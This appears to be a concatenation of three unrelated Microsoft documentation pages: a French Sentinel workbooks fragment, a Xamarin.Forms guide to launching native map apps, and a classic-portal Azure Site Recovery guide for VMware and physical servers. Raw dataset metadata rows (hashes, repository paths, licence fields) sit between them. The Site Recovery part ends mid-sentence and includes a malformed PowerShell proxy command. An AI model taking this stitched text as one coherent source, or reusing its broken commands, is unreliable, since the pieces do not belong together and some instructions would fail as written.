<a name="print-a-workbook-or-save-as-pdf"></a>Imprimer un classeur ou enregistrer au format PDF Pour imprimer un classeur ou l’enregistrer au format PDF, utilisez le menu Options à droite du titre du classeur. 1. Sélectionnez Options > :::image type="icon" source="media/whats-new/print-icon.png" border="false"::: **Imprimer le contenu**. 2. Dans l’écran d’impression, ajustez vos paramètres d’impression si nécessaire ou sélectionnez **Enregistrer au format PDF** pour l’enregistrer localement. Exemple : [ ![Imprimez votre classeur ou enregistrez-le au format PDF.](media/whats-new/print-workbook.png) ](media/whats-new/print-workbook.png#lightbox) ## <a name="how-to-delete-workbooks"></a>Comment supprimer des classeurs Pour supprimer un classeur enregistré (soit un modèle enregistré ou un classeur personnalisé), dans la page Classeurs, sélectionnez le classeur enregistré à supprimer, puis sélectionnez **Supprimer**. Cette opération supprime le classeur enregistré. > [!NOTE] > Elle supprime le classeur, mais aussi toutes les modifications que vous avez apportées au modèle. Le modèle d’origine reste disponible. ## <a name="next-steps"></a>Étapes suivantes Dans cet article, vous avez appris à visualiser vos données dans Microsoft Sentinel, à l'aide des workbooks Azure. Pour savoir comment automatiser vos réponses aux menaces, voir [Configurer des réponses automatisées aux menaces dans Microsoft Sentinel](tutorial-respond-threats-playbook.md). Pour en savoir plus sur les workbooks intégrés les plus populaires, voir [Workbooks Microsoft Sentinel couramment utilisés](top-workbooks.md).
67.007407
825
0.785209
fra_Latn
0.98778
6f570cab9c96cf304e3affe6527cc928eccbcba5
4,899
md
Markdown
docs/xamarin-forms/user-interface/map/native-map-app.md
jedieaston/xamarin-docs
2105091f2eeb7844b19ae94708a6ab07e3e79bce
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/xamarin-forms/user-interface/map/native-map-app.md
jedieaston/xamarin-docs
2105091f2eeb7844b19ae94708a6ab07e3e79bce
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/xamarin-forms/user-interface/map/native-map-app.md
jedieaston/xamarin-docs
2105091f2eeb7844b19ae94708a6ab07e3e79bce
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: "Launch the Native Map App from Xamarin.Forms" description: "The native maps app on each platform can be launched from a Xamarin.Forms application by the Xamarin.Essentials Launcher class." ms.prod: xamarin ms.assetid: 5CF7CD67-3F20-4D80-B99E-D35A5FD1019A ms.technology: xamarin-forms author: davidbritch ms.author: dabritch ms.date: 10/30/2019 no-loc: [Xamarin.Forms, Xamarin.Essentials] --- # Launch the Native Map App from Xamarin.Forms [![Download Sample](~/media/shared/download.png) Download the sample](https://docs.microsoft.com/samples/xamarin/xamarin-forms-samples/workingwithmaps) The native map app on each platform can be launched from a Xamarin.Forms application by the Xamarin.Essentials `Launcher` class. This class enables an application to open another app through its custom URI scheme. The launcher functionality can be invoked with the `OpenAsync` method, passing in a `string` or `Uri` argument that represents the custom URL scheme to open. For more information about Xamarin.Essentials, see [Xamarin.Essentials](~/essentials/index.md?context=xamarin/xamarin-forms). > [!NOTE] > An alternative to using the Xamarin.Essentials `Launcher` class is to use its `Map` class. For more information, see [Xamarin.Essentials: Map](~/essentials/maps.md?context=xamarin/xamarin-forms). The maps app on each platform uses a unique custom URI scheme. For information about the maps URI scheme on iOS, see [Map Links](https://developer.apple.com/library/archive/featuredarticles/iPhoneURLScheme_Reference/MapLinks/MapLinks.html) on developer.apple.com. For information about the maps URI scheme on Android, see [Maps Developer Guide](https://developer.android.com/guide/components/intents-common.html#Maps) and [Google Maps Intents for Android](https://developers.google.com/maps/documentation/urls/android-intents) on developers.android.com. For information about the maps URI scheme on the Universal Windows Platform (UWP), see [Launch the Windows Maps app](/windows/uwp/launch-resume/launch-maps-app). ## Launch the map app at a specific location A location in the native maps app can be opened by adding appropriate query parameters to the custom URI scheme for each map app: ```csharp if (Device.RuntimePlatform == Device.iOS) { // https://developer.apple.com/library/ios/featuredarticles/iPhoneURLScheme_Reference/MapLinks/MapLinks.html await Launcher.OpenAsync("http://maps.apple.com/?q=394+Pacific+Ave+San+Francisco+CA"); } else if (Device.RuntimePlatform == Device.Android) { // open the maps app directly await Launcher.OpenAsync("geo:0,0?q=394+Pacific+Ave+San+Francisco+CA"); } else if (Device.RuntimePlatform == Device.UWP) { await Launcher.OpenAsync("bingmaps:?where=394 Pacific Ave San Francisco CA"); } ``` This example code results in the native map app being launched on each platform, with the map centered on a pin representing the specified location: [![Screenshot of native map app, on iOS and Android](native-map-app-images/location.png "Native map app")](native-map-app-images/location-large.png#lightbox "Native map app") ## Launch the map app with directions The native maps app can be launched displaying directions, by adding appropriate query parameters to the custom URI scheme for each map app: ```csharp if (Device.RuntimePlatform == Device.iOS) { // https://developer.apple.com/library/ios/featuredarticles/iPhoneURLScheme_Reference/MapLinks/MapLinks.html await Launcher.OpenAsync("http://maps.apple.com/?daddr=San+Francisco,+CA&saddr=cupertino"); } else if (Device.RuntimePlatform == Device.Android) { // opens the 'task chooser' so the user can pick Maps, Chrome or other mapping app await Launcher.OpenAsync("http://maps.google.com/?daddr=San+Francisco,+CA&saddr=Mountain+View"); } else if (Device.RuntimePlatform == Device.UWP) { await Launcher.OpenAsync("bingmaps:?rtp=adr.394 Pacific Ave San Francisco CA~adr.One Microsoft Way Redmond WA 98052"); } ``` This example code results in the native map app being launched on each platform, with the map centered on a route between the specified locations: [![Screenshot of native map app route, on iOS and Android](native-map-app-images/directions.png "Native map app directions")](native-map-app-images/directions-large.png#lightbox "Native map app directions") ## Related links - [Maps Sample](https://docs.microsoft.com/samples/xamarin/xamarin-forms-samples/workingwithmaps) - [Xamarin.Essentials](~/essentials/index.md?context=xamarin/xamarin-forms) - [Map Links](https://developer.apple.com/library/archive/featuredarticles/iPhoneURLScheme_Reference/MapLinks/MapLinks.html) - [Maps Developer Guide](https://developer.android.com/guide/components/intents-common.html#Maps) - [Google Maps Intents for Android](https://developers.google.com/maps/documentation/) - [Launch the Windows Maps app](/windows/uwp/launch-resume/launch-maps-app)
59.743902
715
0.780567
eng_Latn
0.757809
6f574d8d06c109f2e3f294fd393c4f169a72c3f9
68,280
md
Markdown
articles/site-recovery/site-recovery-vmware-to-azure-classic.md
ggailey777/azure-docs
4520cf82cb3d15f97877ba445b0cfd346c81a034
[ "CC-BY-3.0" ]
null
null
null
articles/site-recovery/site-recovery-vmware-to-azure-classic.md
ggailey777/azure-docs
4520cf82cb3d15f97877ba445b0cfd346c81a034
[ "CC-BY-3.0" ]
null
null
null
articles/site-recovery/site-recovery-vmware-to-azure-classic.md
ggailey777/azure-docs
4520cf82cb3d15f97877ba445b0cfd346c81a034
[ "CC-BY-3.0" ]
null
null
null
--- title: Replicate VMware virtual machines and physical servers to Azure with Azure Site Recovery | Microsoft Docs description: This article describes how to deploy Azure Site Recovery to orchestrate replication, failover and recovery of on-premises VMware virtual machines and Windows/Linux physical servers to Azure. services: site-recovery documentationcenter: '' author: rayne-wiselman manager: jwhit editor: '' ms.assetid: a9022c1f-43c1-4d38-841f-52540025fb46 ms.service: site-recovery ms.workload: backup-recovery ms.tgt_pltfrm: na ms.devlang: na ms.topic: article ms.date: 09/29/2016 ms.author: raynew --- # Replicate VMware virtual machines and physical servers to Azure with Azure Site Recovery > [!div class="op_single_selector"] > * [Azure Portal](site-recovery-vmware-to-azure.md) > * [Classic Portal](site-recovery-vmware-to-azure-classic.md) > * [Classic Portal (legacy)](site-recovery-vmware-to-azure-classic-legacy.md) > > The Azure Site Recovery service contributes to your business continuity and disaster recovery (BCDR) strategy by orchestrating replication, failover and recovery of virtual machines and physical servers. Machines can be replicated to Azure, or to a secondary on-premises data center. For a quick overview read [What is Azure Site Recovery?](site-recovery-overview.md). ## Overview This article describes how to: * **Replicate VMware virtual machines to Azure**—Deploy Site Recovery to coordinate replication, failover, and recovery of on-premises VMware virtual machines to Azure storage. * **Replicate physical servers to Azure**—Deploy Azure Site Recovery to coordinate replication, failover, and recovery of on-premises physical Windows and Linux servers to Azure. > [!NOTE] > This article describes how to replicate to Azure. If you want to replicate VMware VMs or Windows/Linux physical servers to a secondary datacenter, follow the instructions in [this article](site-recovery-vmware-to-vmware.md). > > Post any comments or questions at the bottom of this article, or on the [Azure Recovery Services Forum](https://social.msdn.microsoft.com/forums/azure/home?forum=hypervrecovmgr). ## Enhanced deployment This article includes contains instructions for an enhanced deployment in the classic Azure portal. We recommend you use this version for all new deployments. If you've already deployed using the earlier legacy version we recommend that you migrate to the new version. Read [more](site-recovery-vmware-to-azure-classic-legacy.md#migrate-to-the-enhanced-deployment) about migration. The enhanced deployment is a major update. Here's a summary of the improvements we've made: * **No infrastructure VMs in Azure**: Data replicates directly to an Azure storage account. In addition for replication and failover there's no need to set up any infrastructure VMs (configuration server, master target server) as we needed in the legacy deployment. * **Unified installation**: A single installation provides simple setup and scalability for on-premises components. * **Secure deployment**: All traffic is encrypted and replication management communications are sent over HTTPS 443. * **Recovery points**: Support for crash and application-consistent recovery points for Windows and Linux environments, and supports both single VM and multi-VM consistent configurations. * **Test failover**: Support for non-disruptive test failover to Azure, without impacting production or pausing replication. * **Unplanned failover**: Support for unplanned failover to Azure with an enhanced option to shut down VMs automatically before failover. * **Failback**: Integrated failback that replicates only delta changes back to the on-premises site. * **vSphere 6.0**: Limited support for VMware Vsphere 6.0 deployments. ## How does Site Recovery help protect virtual machines and physical servers? * VMware administrators can configure off-site protection to Azure of business workloads and applications running on VMware virtual machines. Server managers can replicate physical on-premises Windows and Linux servers to Azure. * The Azure Site Recovery console provides a single location for simple setup and management of replication, failover, and recovery processes. * If you replicate VMware virtual machines that are managed by a vCenter server, Site Recovery can discover those VMs automatically. If machines are on a ESXi host Site Recovery discovers VMs on the host. * Run easy failovers from your on-premises infrastructure to Azure, and failback (restore) from Azure to VMware VM servers in the on-premises site. * Configure recovery plans that group together application workloads that are tiered across multiple machines. You can fail over those plans, and Site Recovery provides multi-VM consistency so that machines running the same workloads can be recovered together to a consistent data point. ## Supported Operating Systems ### Windows(64 bit only) * Windows Server 2008 R2 SP1+ * Windows Server 2012 * Windows Server 2012 R2 ### Linux (64 bit only) * Red Hat Enterprise Linux 6.7, 7.1, 7.2 * CentOS 6.5, 6.6, 6.7, 7.0, 7.1, 7.2 * Oracle Enterprise Linux 6.4, 6.5 running either the Red Hat compatible kernel or Unbreakable Enterprise Kernel Release 3 (UEK3) * SUSE Linux Enterprise Server 11 SP3 ## Scenario architecture Scenario components: * **An on-premises management server**: The management server runs Site Recovery components: * **Configuration server**: Coordinates communication and manages data replication and recovery processes. * **Process server**: Acts as a replication gateway. It receives data from protected source machines, optimizes it with caching, compression, and encryption, and sends replication data to Azure storage. It also handles push installation of Mobility service to protected machines and performs automatic discovery of VMware VMs. * **Master target server**: Handles replication data during failback from Azure. You can also deploy a management server that acts as a process server only, in order to scale your deployment. * **The Mobility service**: This component is deployed on each machine (VMware VM or physical server) that you want to replicate to Azure. It captures data writes on the machine and forwards them to the process server. * **Azure**: You don't need to create any Azure VMs to handle replication and failover. The Site Recovery service handles data management, and data replicates directly to Azure storage. Replicated Azure VMs are spun up automatically only when failover to Azure occurs. However, if you want to fail back from Azure to the on-premises site you will need to set up an Azure VM to act as a process server. The graphic shows how these components interact. ![architecture](./media/site-recovery-vmware-to-azure/v2a-architecture-henry.png) **Figure 1: VMware/physical to Azure** (created by Henry Robalino) ## Capacity planning When you’re planning capacity, here's what you need to think about: * **The source environment**—Capacity planning or the VMware infrastructure and source machine requirements. * **The management server**—Planning for the on-premises management servers that run Site Recovery components. * **Network bandwidth from source to target**-Planning for network bandwidth required for replication between source and Azure ### Source environment considerations * **Maximum daily change rate**—A protected machine can only use one process server, and a single process server can handle up to 2 TB of data change per day. Thus 2 TB is the maximum daily data change rate that’s supported for a protected machine. * **Maximum throughput**—A replicated machine can belong to one storage account in Azure. A standard storage account can handle a maximum of 20,000 requests per second, and we recommend that you keep the number of IOPS across a source machine to 20,000. For example if you have a source machine with 5 disks and each disk generates 120 IOPS (8K size) on the source then it will be within the Azure per disk IOPS limit of 500. The number of storage accounts required = total source IOPs/20000. ### Management server considerations The management server runs Site Recovery components that handle data optimization, replication and management. It should be able to handle the daily change rate capacity across all workloads running on protected machines, and has sufficient bandwidth to continuously replicate data to Azure storage. Specifically: * The process server receives replication data from protected machines and optimizes it with caching, compression, and encryption before sending to Azure. The management server should have sufficient resources to perform these tasks. * The process server uses disk based cache. We recommend a separate cache disk of 600 GB or more to handle data changes stored in the event of network bottleneck or outage. During deployment you can configure the cache on any drive that has at least 5 GB of storage available but 600 GB is the minimum recommendation. * As a best practice we recommend that the management server be located on the same network and LAN segment as the machines you want to protect. It can be located on a different network but machines you want to protect should have L3 network visibility to it. Size recommendations for the management server are summarized in the following table. | **Management server CPU** | **Memory** | **Cache disk size** | **Data change rate** | **Protected machines** | | --- | --- | --- | --- | --- | | 8 vCPUs (2 sockets * 4 cores @ 2.5GHz) |16 GB |300 GB |500 GB or less |Deploy a management server with these settings to replicate less than 100 machines. | | 12 vCPUs (2 sockets * 6 cores @ 2.5GHz) |18 GB |600 GB |500 GB to 1 TB |Deploy a management server with these settings to replicate between 100-150 machines. | | 16 vCPUs (2 sockets * 8 cores @ 2.5GHz) |32 GB |1 TB |1 TB to 2 TB |Deploy a management server with these settings to replicate between 150-200 machines. | | Deploy another process server | | |> 2 TB |Deploy additional process servers if you're replicating more than 200 machines, or if the daily data change rate exceeds 2 TB. | Where: * Each source machine is configured with 3 disks of 100 GB each. * We used benchmarking storage of 8 SAS drives of 10 K RPM with RAID 10 for cache disk measurements. ### Network bandwidth from source to target Make sure you calculate the bandwidth that would be required for initial replication and delta replication using the [capacity planner tool](site-recovery-capacity-planner.md) #### Throttling bandwidth used for replication VMware traffic replicated to Azure goes through a specific process server. You can throttle the bandwidth that's available for Site Recovery replication on that server as follows: 1. Open the Microsoft Azure Backup MMC snap-in on the main management server or on a management server running additional provisioned process servers. By default a shortcut for Microsoft Azure Backup is created on desktop, or you can find it in: C:\Program Files\Microsoft Azure Recovery Services Agent\bin\wabadmin. 2. In the snap-in click **Change Properties**. ![Throttle bandwidth](./media/site-recovery-vmware-to-azure-classic/throttle1.png) 3. On the **Throttling** tab specify the bandwidth that can be used for Site Recovery replication and the applicable scheduling. ![Throttle bandwidth](./media/site-recovery-vmware-to-azure-classic/throttle2.png) Optionally you can also set throttling using PowerShell. Here's an example: Set-OBMachineSetting -WorkDay $mon, $tue -StartWorkHour "9:00:00" -EndWorkHour "18:00:00" -WorkHourBandwidth (512*1024) -NonWorkHourBandwidth (2048*1024) #### Maximizing bandwidth usage To increase the bandwidth utilized for replication by Azure Site Recovery you would need to change a registry key. The following key controls the number of threads per replicating disk that are used when replicating HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Azure Backup\Replication\UploadThreadsPerVM In an “overprovisioned” network, this registry key needs to be changed from it’s default values. We support a maximum of 32. [Learn more](site-recovery-capacity-planner.md) about detailed capacity planning. ### Additional process servers If you need to protect more than 200 machines or daily change rate is greater that 2 TB you can add additional servers to handle the load. To scale out you can: * Increase the number of management servers. For example you can protect up to 400 machines with two management servers. * Add additional process servers and use these to handle traffic instead of (or in addition to) the management server. This table describes a scenario in which: * You set up the original management server to use it as a configuration server only. * You set up an additional process server. * You configure protected virtual machines to use the additional process server. * Each protected source machine is configured with three disks of 100 GB each. | **Original management server**<br/><br/>(configuration server) | **Additional process server** | **Cache disk size** | **Data change rate** | **Protected machines** | | --- | --- | --- | --- | --- | | 8 vCPUs (2 sockets * 4 cores @ 2.5GHz), 16 GB memory |4 vCPUs (2 sockets * 2 cores @ 2.5GHz), 8 GB memory |300 GB |250 GB or less |You can replicate 85 or less machines. | | 8 vCPUs (2 sockets * 4 cores @ 2.5GHz), 16 GB memory |8 vCPUs (2 sockets * 4 cores @ 2.5GHz), 12 GB memory |600 GB |250 GB to 1 TB |You can replicate between 85-150 machines. | | 12 vCPUs (2 sockets * 6 cores @ 2.5GHz), 18 GB memory |12 vCPUs (2 sockets * 6 cores @ 2.5GHz) 24 GB memory |1 TB |1 TB to 2 TB |You can replicate between 150-225 machines. | The way in which you scale your servers will depend on your preference for a scale up or scale out model. You scale up by deploying a few high-end management and process servers, or scale out by deploying more servers with less resources. For example: if you need to protect 220 machines you could do either of the following: * Configure the original management server with 12vCPU, 18 GB of memory, an additional process server with 12vCPU, 24 GB of memory, and configure protected machines to use the additional process server only. * Or alternatively you could configure two management servers (2 x 8vCPU, 16 GB RAM) and two additional process servers (1 x 8vCPU and 4vCPU x 1 to handle 135 + 85 (220) machines), and configure protected machines to use the additional process servers only. [Follow these instructions](#deploy-additional-process-servers) to set up an additional process server. ## Before you start deployment The tables summarize the prerequisites for deploying this scenario. ### Azure prerequisites | **Prerequisite** | **Details** | | --- | --- | | **Azure account** |You'll need a [Microsoft Azure](https://azure.microsoft.com/) account. You can start with a [free trial](https://azure.microsoft.com/pricing/free-trial/). [Learn more](https://azure.microsoft.com/pricing/details/site-recovery/) about Site Recovery pricing. | | **Azure storage** |You'll need an Azure storage account to store replicated data. Replicated data is stored in Azure storage and Azure VMs are spun up when failover occurs. <br/><br/>You need a [standard geo-redundant storage account](../storage/storage-redundancy.md#geo-redundant-storage). The account must be in the same region as the Site Recovery service, and be associated with the same subscription. Note that replication to premium storage accounts isn't currently supported and shouldn't be used.<br/><br/>We do not support the move of Storage accounts created using the [new Azure portal](../storage/storage-create-storage-account.md) across resource groups.[Read about](../storage/storage-introduction.md) Azure storage.<br/><br/> | | **Azure network** |You'll need an Azure virtual network that Azure VMs will connect to when failover occurs. The Azure virtual network must be in the same region as the Site Recovery vault.<br/><br/>Note that to fail back after failover to Azure you’ll need a VPN connection (or Azure ExpressRoute) set up from the Azure network to the on-premises site. | ### On-premises prerequisites | **Prerequisite** | **Details** | | --- | --- | | **Management server** |You need an on-premises Windows 2012 R2 server running on a virtual machine or physical server. All of the on-premises Site Recovery components are installed on this management server<br/><br/> We recommend you deploy the server as a highly available VMware VM. Failback to the on-premises site from Azure is always be to VMware VMs regardless of whether you failed over VMs or physical servers. If you don't configure the Management server as a VMware VM you'll need to set up a separate master target server as a VMware VM to receive failback traffic.<br/><br/>The server should not be a Domain Controller.<br/><br/>The server should have a static IP address.<br/><br/>The host name of the server should be 15 characters or less.<br/><br/>The operating system locale should be English only.<br/><br/>The management server requires internet access.<br/><br/>You need outbound access from the server as follows: Temporary access on HTTP 80 during setup of the Site Recovery components (to download MySQL); Ongoing outbound access on HTTPS 443 for replication management; Ongoing outbound access on HTTPS 9443 for replication traffic (this port can be modified)<br/><br/> Make sure these URLs are accessible from the management server: <br/>- \*.hypervrecoverymanager.windowsazure.com<br/>- \*.accesscontrol.windows.net<br/>- \*.backup.windowsazure.com<br/>- \*.blob.core.windows.net<br/>- \*.store.core.windows.net<br/>-https://www.msftncsi.com/ncsi.txt<br/>- [ https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi](https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi " https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi")<br/><br/>If you have IP address-based firewall rules on the server, check that the rules allow communication to Azure. You'll need to allow the [Azure Datacenter IP Ranges](https://www.microsoft.com/download/details.aspx?id=41653) and the HTTPS (443) port. You'll also need to white list IP address ranges for the Azure region of your subscription, and for West US. The URL [https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi](https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi " https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi") is for downloading MySQL. | | **VMware vCenter/ESXi host**: |You need one or more vMware vSphere ESX/ESXi hypervisors managing your VMware virtual machines, running ESX/ESXi version 6.0, 5.5 or 5.1 with the latest updates.<br/><br/> We recommend you deploy a VMware vCenter server to manage your ESXi hosts. It should be running vCenter version 6.0 or 5.5 with the latest updates.<br/><br/>Note that Site Recovery doesn't support new vCenter and vSphere 6.0 features such as cross vCenter vMotion, virtual volumes, and storage DRS. Site Recovery support is limited to features that were also available in version 5.5. | | **Protected machines**: |**AZURE**<br/><br/>Machines you want to protect should conform with [Azure prerequisites](site-recovery-best-practices.md#azure-virtual-machine-requirements) for creating Azure VMs.<br><br/>If you want to connect to the Azure VMs after failover then you’ll need to enable Remote Desktop connections on the local firewall.<br/><br/>Individual disk capacity on protected machines shouldn’t be more than 1023 GB. A VM can have up to 64 disks (thus up to 64 TB). If you have disks larger than 1 TB consider using database replication such as SQL Server Always On or Oracle Data Guard.<br/><br/>Minimum 2 GB of available space on the installation drive for component installation.<br/><br/>Shared disk guest clusters aren't supported. If you have a clustered deployment consider using database replication such as SQL Server Always On or Oracle Data Guard.<br/><br/>Unified Extensible Firmware Interface(UEFI)/Extensible Firmware Interface(EFI) boot isn't supported.<br/><br/>Machine names should contain between 1 and 63 characters (letters, numbers and hyphens). The name must start with a letter or number and end with a letter or number. After a machine is protected you can modify the Azure name.<br/><br/>**VMware VMs**<br/><br>You’ll need to install VMware vSphere PowerCLI 6.0. on the management server (configuration server).<br/><br/>VMware VMs you want to protect should have VMware tools installed and running.<br/><br/>If the source VM has NIC teaming it’s converted to a single NIC after failover to Azure.<br/><br/>If protected VMs have an iSCSI disk then Site Recovery converts the protected VM iSCSI disk into a VHD file when the VM fails over to Azure. If iSCSI target can be reached by the Azure VM then it will connect to iSCSI target and essentially see two disks – the VHD disk on the Azure VM and the source iSCSI disk. In this case you’ll need to disconnect the iSCSI target that appears on the failed over Azure VM.<br/><br/>[Learn more](#vmware-permissions-for-vcenter-access) about the VMware user permissions that are needed by Site Recovery.<br/><br/> **WINDOWS SERVER MACHINES (on VMware VM or physical server)**<br/><br/>The server should be running a supported 64-bit operating system: Windows Server 2012 R2, Windows Server 2012, or Windows Server 2008 R2 with at least SP1.<br/><br/>The operating system should be installed on C:\ drive and the OS disk should be a Windows basic disk (OS shouldn’t be installed on a Windows dynamic disk.)<br/><br/>For Windows Server 2008 R2 machines you will need to have .NET Framework 3.5.1 installed.<br/><br/>You'll need to provide an administrator account (must be a local administrator on the Windows machine) for the push installation the Mobility Service on Windows servers. If the provided account is a non-domain account you'll need to disable Remote User Access control on the local machine. [Learn more](#install-the-mobility-service-with-push-installation).<br/><br/>Site Recovery supports VMs with RDM disk. During failback Site Recovery will reuse the RDM disk if the original source VM and RDM disk is available. If they aren’t available, during failback Site Recovery will create a new VMDK file for each disk.<br/><br/>**LINUX MACHINES**<br/><br/>You’ll need a supported 64 bit operating system: Red Hat Enterprise Linux 6.7; Centos 6.5, 6.6,6.7; Oracle Enterprise Linux 6.4, 6.5 running either the Red Hat compatible kernel or Unbreakable Enterprise Kernel Release 3 (UEK3), SUSE Linux Enterprise Server 11 SP3.<br/><br/>/etc/hosts files on protected machines should contain entries that map the local host name to IP addresses associated with all network adapters. <br/><br/>If you want to connect to an Azure virtual machine running Linux after failover using a Secure Shell client (ssh), ensure that the Secure Shell service on the protected machine is set to start automatically on system boot, and that firewall rules allow an ssh connection to it.<br/><br/>Protection can only be enabled for Linux machines with the following storage: File system (EXT3, ETX4, ReiserFS, XFS); Multipath software-Device Mapper (multipath)); Volume manager: (LVM2). Physical servers with HP CCISS controller storage are not supported. The ReiserFS filesystem is supported only on SUSE Linux Enterprise Server 11 SP3.<br/><br/>Site Recovery supports VMs with RDM disk. During failback for Linux, Site Recovery doesn’t reuse the RDM disk. Instead it creates a new VMDK file for each corresponding RDM disk. | Only for Linux VM - ensure that you set the disk.enableUUID=true setting in Configuration Parameters of the VM in VMware. If this row does not exist, add it. This is required to provide a consistent UUID to the VMDK so that it mounts correctly. Also note that without this setting, failback will cause a full download even if the VM is available on-prem. Adding this setting will ensure that only delta changes are transferred back during failback. ## Step 1: Create a vault 1. Sign in to the [Management Portal](https://manage.windowsazure.com/). 2. Expand **Data Services** > **Recovery Services** and click **Site Recovery Vault**. 3. Click **Create New** > **Quick Create**. 4. In **Name**, enter a friendly name to identify the vault. 5. In **Region**, select the geographic region for the vault. To check supported regions see Geographic Availability in [Azure Site Recovery Pricing Details](https://azure.microsoft.com/pricing/details/site-recovery/) 6. Click **Create vault**. ![New vault](./media/site-recovery-vmware-to-azure-classic/quick-start-create-vault.png) Check the status bar to confirm that the vault was successfully created. The vault will be listed as **Active** on the main **Recovery Services** page. ## Step 2: Set up an Azure network Set up an Azure network so that Azure VMs will be connected to a network after failover, and so that failback to the on-premises site can work as expected. 1. In the Azure portal > **Create virtual network** specify the network name. IP address range and subnet name. 2. You would need to add VPN/ExpressRoute to the network if you need to do failback. VPN/ExpressRoute can be added to the network even after failover. [Read more](../virtual-network/virtual-networks-overview.md) about Azure networks. > [!NOTE] > [Migration of networks](../resource-group-move-resources.md) across resource groups within the same subscription or across subscriptions is not supported for networks used for deploying Site Recovery. > > ## Step 3: Install the VMware components If you want to replicate VMware virtual machines install the following VMware components on the management server: 1. [Download](https://developercenter.vmware.com/tool/vsphere_powercli/6.0) and install VMware vSphere PowerCLI 6.0. 2. Restart the server. ## Step 4: Download a vault registration key 1. From the management server open the Site Recovery console in Azure. In the **Recovery Services** page click the vault to open the Quick Start page. Quick Start can also be opened at any time using the icon. ![Quick Start Icon](./media/site-recovery-vmware-to-azure-classic/quick-start-icon.png) 2. On the **Quick Start** page click **Prepare Target Resources** > **Download a registration key**. The registration file is generated automatically. It's valid for 5 days after it's generated. ## Step 5: Install the management server > [!TIP] > Make sure these URLs are accessible from the management server: > > * *.hypervrecoverymanager.windowsazure.com > * *.accesscontrol.windows.net > * *.backup.windowsazure.com > * *.blob.core.windows.net > * *.store.core.windows.net > * https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi > * https://www.msftncsi.com/ncsi.txt > > [!VIDEO https://channel9.msdn.com/Blogs/Windows-Azure/Enhanced-VMware-to-Azure-Setup-Registration/player] 1. On the **Quick Start** page download the unified installation file to the server. 2. Run the installation file to start setup in the Site Recovery Unified Setup wizard. 3. In **Before you begin** select **Install the configuration server and process server**. ![Before you start](./media/site-recovery-vmware-to-azure-classic/combined-wiz1.png) 4. In **Third-Party Software License** click **I Accept** to download and install MySQL. ![Third=party software](./media/site-recovery-vmware-to-azure-classic/combined-wiz105.PNG) 5. In **Registration** browse and select the registration key you downloaded from the vault. ![Registration](./media/site-recovery-vmware-to-azure-classic/combined-wiz3.png) 6. In **Internet Settings** specify how the Provider running on the configuration server will connect to Azure Site Recovery over the internet. * If you want to connect with the proxy that's currently set up on the machine select **Connect with existing proxy settings**. * If you want the Provider to connect directly select **Connect directly without a proxy**. * If the existing proxy requires authentication, or you want to use a custom proxy for the Provider connection, select **Connect with custom proxy settings**. * If you use a custom proxy you'll need to specify the address, port, and credentials * If you're using a proxy you should have already allowed the following URLs: * *.hypervrecoverymanager.windowsazure.com; * *.accesscontrol.windows.net; * *.backup.windowsazure.com; * *.blob.core.windows.net; * *.store.core.windows.net ![Firewall](./media/site-recovery-vmware-to-azure-classic/combined-wiz4.png) 1. In **Prerequisites Check** setup runs a check to make sure that installation can run. ![Prerequisites](./media/site-recovery-vmware-to-azure-classic/combined-wiz5.png) If a warning appears about the **Global time sync check** verify that the time on the system clock (**Date and Time** settings) is the same as the time zone. ![TimeSyncIssue](./media/site-recovery-vmware-to-azure-classic/time-sync-issue.png) 1. In **MySQL Configuration** create credentials for logging onto the MySQL server instance that will be installed. ![MySQL](./media/site-recovery-vmware-to-azure-classic/combined-wiz6.png) 2. In **Environment Details** select whether you're going to replicate VMware VMs. If you are, then setup checks that PowerCLI 6.0 is installed. ![MySQL](./media/site-recovery-vmware-to-azure-classic/combined-wiz7.png) 3. In **Install Location** select where you want to install the binaries and store the cache. You can select a drive that has at least 5 GB of storage available but we recommend a cache drive with at least 600 GB of free space. ![Install location](./media/site-recovery-vmware-to-azure-classic/combined-wiz8.png) 4. In **Network Selection** specify the listener (network adapter and SSL port) on which the configuration server will send and receive replication data. You can modify the default port (9443). In addition to this port, port 443 will be used by a web server which orchestrates replication operations. 443 shouldn't be used for receiving replication traffic. ![Network selection](./media/site-recovery-vmware-to-azure-classic/combined-wiz9.png) 1. In **Summary** review the information and click **Install**. When installation finishes a passphrase is generated. You'll need it when you enable replication so copy it and keep it in a secure location. ![Summary](./media/site-recovery-vmware-to-azure-classic/combined-wiz10.png) 2. In **Summary** review the information. ![Summary](./media/site-recovery-vmware-to-azure-classic/combined-wiz10.png) > [!WARNING] > Microsoft Azure Recovery Service Agent's proxy needs to be setup. > Once the installation is complete launch an application named "Microsoft Azure Recovery Services Shell" from the Windows Start menu. In the command window that opens up run the following set of commands to setup the proxy server settings. > > $pwd = ConvertTo-SecureString -String ProxyUserPassword > Set-OBMachineSetting -ProxyServer http://myproxyserver.domain.com -ProxyPort PortNumb – ProxyUserName domain\username -ProxyPassword $pwd > net stop obengine > net start obengine > > ### Run setup from the command line You can also run the unified wizard from the command line, as follows: UnifiedSetup.exe [/ServerMode <CS/PS>] [/InstallDrive <DriveLetter>] [/MySQLCredsFilePath <MySQL credentials file path>] [/VaultCredsFilePath <Vault credentials file path>] [/EnvType <VMWare/NonVMWare>] [/PSIP <IP address to be used for data transfer] [/CSIP <IP address of CS to be registered with>] [/PassphraseFilePath <Passphrase file path>] Where: * /ServerMode: Mandatory. Specifies whether the install should install the configuration and process servers or the process server only (used to install additional process servers). Input values: CS, PS. * InstallDrive: Mandatory. Specifies the folder where the components are installed. * /MySQLCredFilePath. Mandatory. Specifies the path to a file where the MySQL server credentials are story. Get the template to create the file. * /VaultCredFilePath. Mandatory. Location of the vault credentials file * /EnvType. Mandatory. Type of installation. Values: VMware, NonVMware * /PSIP and /CSIP. Mandatory. IP address of the process server and configuration server. * /PassphraseFilePath. Mandatory. Location of the passphrase file. * /ByPassProxy. Optional. Specifies the management server connects to Azure without a proxy. * /ProxySettingsFilePath. 